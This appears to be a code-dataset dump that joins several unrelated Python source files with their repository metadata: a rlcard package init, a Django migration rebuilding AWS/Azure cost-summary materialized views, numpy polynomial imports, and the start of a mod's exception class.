    g_scale, b_scale = tuple(g_scale), tuple(b_scale)

    for out_i, in_i in enumerate(range(0, len(unpacked), ucc)):
        packed[out_i] = ((b_scale[unpacked[in_i + chan1]]<<bpc) |
                         g_scale[unpacked[in_i + chan0]])
    return packed
| 37.586967
| 86
| 0.544988
| 11,704
| 78,444
| 3.445745
| 0.03973
| 0.006794
| 0.034516
| 0.003967
| 0.841404
| 0.822758
| 0.797615
| 0.786928
| 0.773736
| 0.758908
| 0
| 0.065708
| 0.339401
| 78,444
| 2,086
| 87
| 37.604986
| 0.712543
| 0.156086
| 0
| 0.701578
| 0
| 0
| 0.004563
| 0
| 0
| 0
| 0.001795
| 0
| 0.007174
| 1
| 0.028694
| false
| 0.002152
| 0.002152
| 0.011478
| 0.068149
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3db544d00fdc6c70c12fb95341cd366373d1301
| 293
|
py
|
Python
|
rlcard/games/karma/__init__.py
|
pettaa123/rlcard
|
f5b98eb3a836406ee51197728a258c834959ddb3
|
[
"MIT"
] | null | null | null |
rlcard/games/karma/__init__.py
|
pettaa123/rlcard
|
f5b98eb3a836406ee51197728a258c834959ddb3
|
[
"MIT"
] | null | null | null |
rlcard/games/karma/__init__.py
|
pettaa123/rlcard
|
f5b98eb3a836406ee51197728a258c834959ddb3
|
[
"MIT"
] | null | null | null |
from rlcard.games.karma.dealer import KarmaDealer as Dealer
#from rlcard.games.karma.judger import KarmaJudger as Judger
from rlcard.games.karma.player import KarmaPlayer as Player
from rlcard.games.karma.round import KarmaRound as Round
from rlcard.games.karma.game import KarmaGame as Game
| 41.857143
| 60
| 0.83959
| 45
| 293
| 5.466667
| 0.355556
| 0.203252
| 0.304878
| 0.406504
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105802
| 293
| 6
| 61
| 48.833333
| 0.938931
| 0.201365
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e3e68fd9d9c3aa2c6b00ad9648fa8ab13795b588
| 28,481
|
py
|
Python
|
koku/reporting/migrations/0100_aws_azure_query_perforance.py
|
Vasyka/koku
|
b5aa9ec41c3b0821e74afe9ff3a5ffaedb910614
|
[
"Apache-2.0"
] | 2
|
2022-01-12T03:42:39.000Z
|
2022-01-12T03:42:40.000Z
|
koku/reporting/migrations/0100_aws_azure_query_perforance.py
|
Vasyka/koku
|
b5aa9ec41c3b0821e74afe9ff3a5ffaedb910614
|
[
"Apache-2.0"
] | null | null | null |
koku/reporting/migrations/0100_aws_azure_query_perforance.py
|
Vasyka/koku
|
b5aa9ec41c3b0821e74afe9ff3a5ffaedb910614
|
[
"Apache-2.0"
] | 1
|
2021-07-21T09:33:59.000Z
|
2021-07-21T09:33:59.000Z
|
# Generated by Django 2.2.10 on 2020-02-28 17:34
import django.contrib.postgres.indexes
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
    """Convert AWS/Azure usage date columns to plain ``DateField``s and
    rebuild every materialized summary view that selects them.

    A PostgreSQL column type cannot change while a view depends on it, so the
    first ``RunSQL`` drops the summary views (and their indexes); the schema
    alterations run in between; the second ``RunSQL`` recreates the views on
    the now date-typed columns. The SQL strings are executed verbatim and are
    reproduced here byte-identical.
    """

    # Builds directly on the tables/views left by the OCP performance migration.
    dependencies = [("reporting", "0099_ocp_performance")]

    operations = [
        migrations.RunSQL(
            # Got to drop these views as we are changing the type of a selected column
            # They will be recreated below
            sql="""
DROP INDEX IF EXISTS aws_cost_summary;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_cost_summary;
DROP INDEX IF EXISTS aws_cost_summary_service;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_cost_summary_by_service;
DROP INDEX IF EXISTS aws_cost_summary_account;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_cost_summary_by_account;
DROP INDEX IF EXISTS aws_cost_summary_region;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_cost_summary_by_region;
DROP INDEX IF EXISTS aws_storage_summary;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_storage_summary;
DROP INDEX IF EXISTS aws_storage_summary_service;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_storage_summary_by_service;
DROP INDEX IF EXISTS aws_storage_summary_account;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_storage_summary_by_account;
DROP INDEX IF EXISTS aws_storage_summary_region;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_storage_summary_by_region;
DROP INDEX IF EXISTS aws_network_summary;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_network_summary;
DROP INDEX IF EXISTS aws_database_summary;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_database_summary;
DROP INDEX IF EXISTS ocpallcstdlysumm_node;
DROP INDEX IF EXISTS ocpallcstdlysumm_node_like;
DROP INDEX IF EXISTS ocpallcstdlysumm_nsp;
DROP MATERIALIZED VIEW IF EXISTS reporting_ocpallcostlineitem_daily_summary;
DROP INDEX IF EXISTS ocpallcstprjdlysumm_node;
DROP INDEX IF EXISTS ocpallcstprjdlysumm_nsp;
DROP INDEX IF EXISTS ocpallcstprjdlysumm_node_like;
DROP INDEX IF EXISTS ocpallcstprjdlysumm_nsp_like;
DROP MATERIALIZED VIEW IF EXISTS reporting_ocpallcostlineitem_project_daily_summary;
DROP INDEX IF EXISTS aws_compute_summary;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_compute_summary;
DROP INDEX IF EXISTS aws_compute_summary_service;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_compute_summary_by_service;
DROP INDEX IF EXISTS aws_compute_summary_region;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_compute_summary_by_region;
DROP INDEX IF EXISTS aws_compute_summary_account;
DROP MATERIALIZED VIEW IF EXISTS reporting_aws_compute_summary_by_account;
"""
        ),
        # Replace datetime-typed usage columns with date-only columns.
        migrations.AlterField(
            model_name="awscostentrylineitemdaily", name="usage_end", field=models.DateField(null=True)
        ),
        migrations.AlterField(model_name="awscostentrylineitemdaily", name="usage_start", field=models.DateField()),
        migrations.AlterField(
            model_name="awscostentrylineitemdailysummary", name="usage_end", field=models.DateField(null=True)
        ),
        migrations.AlterField(
            model_name="awscostentrylineitemdailysummary", name="usage_start", field=models.DateField()
        ),
        migrations.AlterField(
            model_name="azurecostentrylineitemdailysummary", name="usage_end", field=models.DateField(null=True)
        ),
        migrations.AlterField(
            model_name="azurecostentrylineitemdailysummary", name="usage_start", field=models.DateField()
        ),
        migrations.AlterField(model_name="ocpawscostlineitemdailysummary", name="usage_end", field=models.DateField()),
        migrations.AlterField(
            model_name="ocpawscostlineitemdailysummary", name="usage_start", field=models.DateField()
        ),
        migrations.AlterField(model_name="ocpnodelabellineitemdaily", name="usage_end", field=models.DateField()),
        migrations.AlterField(model_name="ocpnodelabellineitemdaily", name="usage_start", field=models.DateField()),
        # GIN indexes (trigram opclasses for LIKE-style filtering on text).
        migrations.AddIndex(
            model_name="awscostentrylineitemdaily",
            index=django.contrib.postgres.indexes.GinIndex(fields=["tags"], name="aws_cost_entry"),
        ),
        migrations.AddIndex(
            model_name="awscostentrylineitemdaily",
            index=django.contrib.postgres.indexes.GinIndex(
                fields=["product_code"], name="aws_cost_pcode_like", opclasses=["gin_trgm_ops"]
            ),
        ),
        migrations.AddIndex(
            model_name="awscostentrylineitemdailysummary",
            index=django.contrib.postgres.indexes.GinIndex(
                fields=["product_code"], name="aws_summ_usage_pcode_like", opclasses=["gin_trgm_ops"]
            ),
        ),
        migrations.AddIndex(
            model_name="awscostentrylineitemdailysummary",
            index=django.contrib.postgres.indexes.GinIndex(
                fields=["product_family"], name="aws_summ_usage_pfam_like", opclasses=["gin_trgm_ops"]
            ),
        ),
        migrations.AddIndex(
            model_name="ocpnodelabellineitemdaily",
            index=models.Index(fields=["usage_start"], name="ocplblnitdly_usage_start"),
        ),
        migrations.AddIndex(
            model_name="ocpnodelabellineitemdaily",
            index=django.contrib.postgres.indexes.GinIndex(fields=["node_labels"], name="ocplblnitdly_node_labels"),
        ),
        # Azure: make usage_date_time a non-null date, then rename it.
        migrations.AlterField(
            model_name="azurecostentrylineitemdaily", name="usage_date_time", field=models.DateField(null=False)
        ),
        migrations.RenameField(
            model_name="azurecostentrylineitemdaily", old_name="usage_date_time", new_name="usage_date"
        ),
        migrations.RunSQL(
            # Recreate the views dropped above against the date-typed columns.
            sql="""
CREATE MATERIALIZED VIEW reporting_aws_cost_summary AS(
SELECT row_number() OVER(ORDER BY date(usage_start)) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start)
)
;
CREATE UNIQUE INDEX aws_cost_summary
ON reporting_aws_cost_summary (usage_start)
;
CREATE MATERIALIZED VIEW reporting_aws_cost_summary_by_service AS(
SELECT row_number() OVER(ORDER BY date(usage_start), product_code, product_family) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
product_code,
product_family,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), product_code, product_family
)
;
CREATE UNIQUE INDEX aws_cost_summary_service
ON reporting_aws_cost_summary_by_service (usage_start, product_code, product_family)
;
CREATE MATERIALIZED VIEW reporting_aws_cost_summary_by_account AS(
SELECT row_number() OVER(ORDER BY date(usage_start), usage_account_id, account_alias_id) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
usage_account_id,
account_alias_id,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), usage_account_id, account_alias_id
)
;
CREATE UNIQUE INDEX aws_cost_summary_account
ON reporting_aws_cost_summary_by_account (usage_start, usage_account_id, account_alias_id)
;
CREATE MATERIALIZED VIEW reporting_aws_cost_summary_by_region AS(
SELECT row_number() OVER(ORDER BY date(usage_start), region, availability_zone) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
region,
availability_zone,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), region, availability_zone
)
;
CREATE UNIQUE INDEX aws_cost_summary_region
ON reporting_aws_cost_summary_by_region (usage_start, region, availability_zone)
;
CREATE MATERIALIZED VIEW reporting_aws_storage_summary AS(
SELECT row_number() OVER(ORDER BY date(usage_start), product_family) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
product_family,
sum(usage_amount) as usage_amount,
max(unit) as unit,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE product_family LIKE '%Storage%'
AND unit = 'GB-Mo'
AND usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), product_family
)
;
CREATE UNIQUE INDEX aws_storage_summary
ON reporting_aws_storage_summary (usage_start, product_family)
;
CREATE MATERIALIZED VIEW reporting_aws_storage_summary_by_service AS(
SELECT row_number() OVER(ORDER BY date(usage_start), product_code, product_family) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
product_code,
product_family,
sum(usage_amount) as usage_amount,
max(unit) as unit,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE product_family LIKE '%Storage%'
AND unit = 'GB-Mo'
AND usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), product_code, product_family
)
;
CREATE UNIQUE INDEX aws_storage_summary_service
ON reporting_aws_storage_summary_by_service (usage_start, product_code, product_family)
;
CREATE MATERIALIZED VIEW reporting_aws_storage_summary_by_account AS(
SELECT row_number() OVER(ORDER BY date(usage_start), usage_account_id, account_alias_id, product_family) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
usage_account_id,
account_alias_id,
product_family,
sum(usage_amount) as usage_amount,
max(unit) as unit,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE product_family LIKE '%Storage%'
AND unit = 'GB-Mo'
AND usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), usage_account_id, account_alias_id, product_family
)
;
CREATE UNIQUE INDEX aws_storage_summary_account
ON reporting_aws_storage_summary_by_account (usage_start, usage_account_id, account_alias_id, product_family)
;
CREATE MATERIALIZED VIEW reporting_aws_storage_summary_by_region AS(
SELECT row_number() OVER(ORDER BY date(usage_start), region, availability_zone, product_family) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
region,
availability_zone,
product_family,
sum(usage_amount) as usage_amount,
max(unit) as unit,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE product_family LIKE '%Storage%'
AND unit = 'GB-Mo'
AND usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), region, availability_zone, product_family
)
;
CREATE UNIQUE INDEX aws_storage_summary_region
ON reporting_aws_storage_summary_by_region (usage_start, region, availability_zone, product_family)
;
CREATE MATERIALIZED VIEW reporting_aws_network_summary AS(
SELECT row_number() OVER(ORDER BY date(usage_start), product_code) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
product_code,
sum(usage_amount) as usage_amount,
max(unit) as unit,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE product_code IN ('AmazonVPC','AmazonCloudFront','AmazonRoute53','AmazonAPIGateway')
AND usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), product_code
)
;
CREATE UNIQUE INDEX aws_network_summary
ON reporting_aws_network_summary (usage_start, product_code)
;
CREATE MATERIALIZED VIEW reporting_aws_database_summary AS(
SELECT row_number() OVER(ORDER BY date(usage_start), product_code) as id,
date(usage_start) as usage_start,
date(usage_start) as usage_end,
product_code,
sum(usage_amount) as usage_amount,
max(unit) as unit,
sum(unblended_cost) as unblended_cost,
sum(markup_cost) as markup_cost,
max(currency_code) as currency_code
FROM reporting_awscostentrylineitem_daily_summary
-- Get data for this month or last month
WHERE product_code IN ('AmazonRDS','AmazonDynamoDB','AmazonElastiCache','AmazonNeptune','AmazonRedshift','AmazonDocumentDB')
AND usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
GROUP BY date(usage_start), product_code
)
;
CREATE UNIQUE INDEX aws_database_summary
ON reporting_aws_database_summary (usage_start, product_code)
;
CREATE MATERIALIZED VIEW reporting_ocpallcostlineitem_daily_summary AS (
SELECT row_number() OVER () as id,
lids.*
FROM (
SELECT 'AWS' as source_type,
cluster_id,
cluster_alias,
namespace,
node::text as node,
resource_id,
usage_start,
usage_end,
usage_account_id,
account_alias_id,
product_code,
product_family,
instance_type,
region,
availability_zone,
tags,
usage_amount,
unit,
unblended_cost,
markup_cost,
currency_code,
shared_projects,
project_costs
FROM reporting_ocpawscostlineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
UNION
SELECT 'Azure' as source_type,
cluster_id,
cluster_alias,
namespace,
node::text as node,
resource_id,
usage_start,
usage_end,
subscription_guid as usage_account_id,
NULL::int as account_alias_id,
service_name as product_code,
NULL as product_family,
instance_type,
resource_location as region,
NULL as availability_zone,
tags,
usage_quantity as usage_amount,
unit_of_measure as unit,
pretax_cost as unblended_cost,
markup_cost,
currency as currency_code,
shared_projects,
project_costs
FROM reporting_ocpazurecostlineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
) AS lids
)
;
CREATE INDEX ocpallcstdlysumm_node on reporting_ocpallcostlineitem_daily_summary (node text_pattern_ops);
CREATE INDEX ocpallcstdlysumm_node_like on reporting_ocpallcostlineitem_daily_summary USING GIN (node gin_trgm_ops);
CREATE index ocpallcstdlysumm_nsp on reporting_ocpallcostlineitem_daily_summary USING GIN (namespace);
CREATE MATERIALIZED VIEW reporting_ocpallcostlineitem_project_daily_summary AS (
SELECT row_number() OVER () as id,
lids.*
FROM (
SELECT 'AWS' as source_type,
cluster_id,
cluster_alias,
data_source,
namespace::text as namespace,
node::text as node,
pod_labels,
resource_id,
usage_start,
usage_end,
usage_account_id,
account_alias_id,
product_code,
product_family,
instance_type,
region,
availability_zone,
usage_amount,
unit,
unblended_cost,
project_markup_cost,
pod_cost,
currency_code
FROM reporting_ocpawscostlineitem_project_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
UNION
SELECT 'Azure' as source_type,
cluster_id,
cluster_alias,
data_source,
namespace::text as namespace,
node::text as node,
pod_labels,
resource_id,
usage_start,
usage_end,
subscription_guid as usage_account_id,
NULL::int as account_alias_id,
service_name as product_code,
NULL as product_family,
instance_type,
resource_location as region,
NULL as availability_zone,
usage_quantity as usage_amount,
unit_of_measure as unit,
pretax_cost as unblended_cost,
project_markup_cost,
pod_cost,
currency as currency_code
FROM reporting_ocpazurecostlineitem_project_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
) AS lids
)
;
CREATE INDEX ocpallcstprjdlysumm_node on reporting_ocpallcostlineitem_project_daily_summary (node text_pattern_ops);
CREATE index ocpallcstprjdlysumm_nsp on reporting_ocpallcostlineitem_project_daily_summary (namespace text_pattern_ops);
CREATE INDEX ocpallcstprjdlysumm_node_like on reporting_ocpallcostlineitem_project_daily_summary USING GIN (node gin_trgm_ops);
CREATE index ocpallcstprjdlysumm_nsp_like on reporting_ocpallcostlineitem_project_daily_summary USING GIN (namespace gin_trgm_ops);
CREATE MATERIALIZED VIEW reporting_aws_compute_summary AS(
SELECT ROW_NUMBER() OVER(ORDER BY c.usage_start, c.instance_type) AS id,
c.usage_start,
c.usage_start as usage_end,
c.instance_type,
r.resource_ids,
CARDINALITY(r.resource_ids) AS resource_count,
c.usage_amount,
c.unit,
c.unblended_cost,
c.markup_cost,
c.currency_code
FROM (
-- this group by gets the counts
SELECT usage_start,
instance_type,
SUM(usage_amount) AS usage_amount,
MAX(unit) AS unit,
SUM(unblended_cost) AS unblended_cost,
SUM(markup_cost) AS markup_cost,
MAX(currency_code) AS currency_code
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
GROUP
BY usage_start,
instance_type
) AS c
JOIN (
-- this group by gets the distinct resources running by day
SELECT usage_start,
instance_type,
ARRAY_AGG(DISTINCT resource_id ORDER BY resource_id) as resource_ids
FROM (
SELECT usage_start,
instance_type,
UNNEST(resource_ids) AS resource_id
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
) AS x
GROUP
BY usage_start,
instance_type
) AS r
ON c.usage_start = r.usage_start
AND c.instance_type = r.instance_type
)
WITH DATA
;
CREATE UNIQUE INDEX aws_compute_summary
ON reporting_aws_compute_summary (usage_start, instance_type)
;
CREATE MATERIALIZED VIEW reporting_aws_compute_summary_by_service AS(
SELECT ROW_NUMBER() OVER(ORDER BY c.usage_start, c.product_code, c.product_family, c.instance_type) AS id,
c.usage_start,
c.usage_start as usage_end,
c.product_code,
c.product_family,
c.instance_type,
r.resource_ids,
CARDINALITY(r.resource_ids) AS resource_count,
c.usage_amount,
c.unit,
c.unblended_cost,
c.markup_cost,
c.currency_code
FROM (
-- this group by gets the counts
SELECT usage_start,
product_code,
product_family,
instance_type,
SUM(usage_amount) AS usage_amount,
MAX(unit) AS unit,
SUM(unblended_cost) AS unblended_cost,
SUM(markup_cost) AS markup_cost,
MAX(currency_code) AS currency_code
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
GROUP
BY usage_start,
product_code,
product_family,
instance_type
) AS c
JOIN (
-- this group by gets the distinct resources running by day
SELECT usage_start,
product_code,
product_family,
instance_type,
ARRAY_AGG(DISTINCT resource_id ORDER BY resource_id) as resource_ids
from (
SELECT usage_start,
product_code,
product_family,
instance_type,
UNNEST(resource_ids) AS resource_id
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
) AS x
GROUP
BY usage_start,
product_code,
product_family,
instance_type
) AS r
ON c.usage_start = r.usage_start
AND c.product_code = r.product_code
AND c.product_family = r.product_family
AND c.instance_type = r.instance_type
)
WITH DATA
;
CREATE UNIQUE INDEX aws_compute_summary_service
ON reporting_aws_compute_summary_by_service (usage_start, product_code, product_family, instance_type)
;
CREATE MATERIALIZED VIEW reporting_aws_compute_summary_by_region AS(
SELECT ROW_NUMBER() OVER(ORDER BY c.usage_start, c.region, c.availability_zone, c.instance_type) AS id,
c.usage_start,
c.usage_start AS usage_end,
c.region,
c.availability_zone,
c.instance_type,
r.resource_ids,
CARDINALITY(r.resource_ids) AS resource_count,
c.usage_amount,
c.unit,
c.unblended_cost,
c.markup_cost,
c.currency_code
FROM (
-- this group by gets the counts
SELECT usage_start,
region,
availability_zone,
instance_type,
SUM(usage_amount) AS usage_amount,
MAX(unit) AS unit,
SUM(unblended_cost) AS unblended_cost,
SUM(markup_cost) AS markup_cost,
MAX(currency_code) AS currency_code
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
GROUP
BY usage_start,
region,
availability_zone,
instance_type
) AS c
JOIN (
-- this group by gets the distinct resources running by day
SELECT usage_start,
region,
availability_zone,
instance_type,
ARRAY_AGG(DISTINCT resource_id ORDER BY resource_id) AS resource_ids
from (
SELECT usage_start,
region,
availability_zone,
instance_type,
UNNEST(resource_ids) AS resource_id
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
) AS x
GROUP
BY usage_start,
region,
availability_zone,
instance_type
) AS r
ON c.usage_start = r.usage_start
AND c.region = r.region
AND c.availability_zone = r.availability_zone
AND c.instance_type = r.instance_type
)
WITH DATA
;
CREATE UNIQUE INDEX aws_compute_summary_region
ON reporting_aws_compute_summary_by_region (usage_start, region, availability_zone, instance_type)
;
CREATE MATERIALIZED VIEW reporting_aws_compute_summary_by_account AS (
SELECT ROW_NUMBER() OVER (ORDER BY c.usage_start, c.usage_account_id, c.account_alias_id, c.instance_type) as id,
c.usage_start,
c.usage_start AS usage_end,
c.usage_account_id,
c.account_alias_id,
c.instance_type,
r.resource_ids,
CARDINALITY(r.resource_ids) AS resource_count,
c.usage_amount,
c.unit,
c.unblended_cost,
c.markup_cost,
c.currency_code
FROM (
-- this group by gets the counts
SELECT usage_start,
usage_account_id,
account_alias_id,
instance_type,
SUM(usage_amount) AS usage_amount,
MAX(unit) AS unit,
SUM(unblended_cost) AS unblended_cost,
SUM(markup_cost) AS markup_cost,
MAX(currency_code) AS currency_code
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= DATE_TRUNC('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
GROUP
BY usage_start,
usage_account_id,
account_alias_id,
instance_type
) AS c
JOIN (
-- this group by gets the distinct resources running by day
SELECT usage_start,
usage_account_id,
account_alias_id,
instance_type,
array_agg(distinct resource_id order by resource_id) as resource_ids
FROM (
SELECT usage_start,
usage_account_id,
account_alias_id,
instance_type,
UNNEST(resource_ids) as resource_id
FROM reporting_awscostentrylineitem_daily_summary
WHERE usage_start >= date_trunc('month', NOW() - '1 month'::interval)::date
AND instance_type IS NOT NULL
) AS x
GROUP
BY usage_start,
usage_account_id,
account_alias_id,
instance_type
) AS r
ON c.usage_start = r.usage_start
AND c.instance_type = r.instance_type
AND (
(c.usage_account_id = r.usage_account_id) OR
(c.account_alias_id = r.account_alias_id)
)
)
WITH DATA
;
CREATE UNIQUE INDEX aws_compute_summary_account
ON reporting_aws_compute_summary_by_account (usage_start, usage_account_id, account_alias_id, instance_type)
;
"""
        ),
    ]
| 38.178284
| 131
| 0.664689
| 3,410
| 28,481
| 5.231965
| 0.058651
| 0.076789
| 0.031388
| 0.022869
| 0.926349
| 0.901575
| 0.855894
| 0.814584
| 0.74951
| 0.70764
| 0
| 0.002119
| 0.270988
| 28,481
| 745
| 132
| 38.22953
| 0.85715
| 0.005196
| 0
| 0.703488
| 1
| 0.00436
| 0.910728
| 0.183204
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00436
| 0
| 0.008721
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e3ef39d7037b4b9b4a8b8c3f605004084edd9f92
| 281
|
py
|
Python
|
example_snippets/multimenus_snippets/Snippets/NumPy/Polynomials/Setup.py
|
kuanpern/jupyterlab-snippets-multimenus
|
477f51cfdbad7409eab45abe53cf774cd70f380c
|
[
"BSD-3-Clause"
] | null | null | null |
example_snippets/multimenus_snippets/Snippets/NumPy/Polynomials/Setup.py
|
kuanpern/jupyterlab-snippets-multimenus
|
477f51cfdbad7409eab45abe53cf774cd70f380c
|
[
"BSD-3-Clause"
] | null | null | null |
example_snippets/multimenus_snippets/Snippets/NumPy/Polynomials/Setup.py
|
kuanpern/jupyterlab-snippets-multimenus
|
477f51cfdbad7409eab45abe53cf774cd70f380c
|
[
"BSD-3-Clause"
] | 1
|
2021-02-04T04:51:48.000Z
|
2021-02-04T04:51:48.000Z
|
import numpy as np
from numpy.polynomial import Polynomial as P
from numpy.polynomial import Chebyshev as T
from numpy.polynomial import Legendre as Le
from numpy.polynomial import Laguerre as La
from numpy.polynomial import Hermite as H
from numpy.polynomial import HermiteE as HE
| 40.142857
| 44
| 0.839858
| 46
| 281
| 5.130435
| 0.369565
| 0.228814
| 0.483051
| 0.635593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13879
| 281
| 7
| 45
| 40.142857
| 0.975207
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5827df13f642c5c6fd43c086cf337eaf9f2bd5c3
| 10,959
|
py
|
Python
|
Python/NeonOcean.S4.Main/NeonOcean/S4/Main/Tools/Exceptions.py
|
NeonOcean/Main
|
2d85e6d4428f01294d2d34f1807287b753f7490c
|
[
"CC-BY-4.0"
] | 1
|
2021-05-20T19:33:44.000Z
|
2021-05-20T19:33:44.000Z
|
Python/NeonOcean.S4.Main/NeonOcean/S4/Main/Tools/Exceptions.py
|
NeonOcean/Main
|
2d85e6d4428f01294d2d34f1807287b753f7490c
|
[
"CC-BY-4.0"
] | 1
|
2020-06-24T22:50:05.000Z
|
2020-06-24T22:50:05.000Z
|
Python/NeonOcean.S4.Main/NeonOcean/S4/Main/Tools/Exceptions.py
|
NeonOcean/S4.Main
|
2d85e6d4428f01294d2d34f1807287b753f7490c
|
[
"CC-BY-4.0"
] | null | null | null |
from __future__ import annotations
import typing
from NeonOcean.S4.Main.Tools import Types
class IncorrectTypeException(Exception):
    """Raised when a value's type is not one of the accepted types.

    Stringifies to a message such as:
    "Expected type 'builtins.str' not 'builtins.int' for 'parameter 1'."
    """

    def __init__(self, value, valueName: str, correctTypes: typing.Tuple[typing.Union[type, str, None], ...], *additional):
        """
        :param value: The incorrectly typed value; its full type name appears in the message.
        :param valueName: Describes what was incorrectly typed.
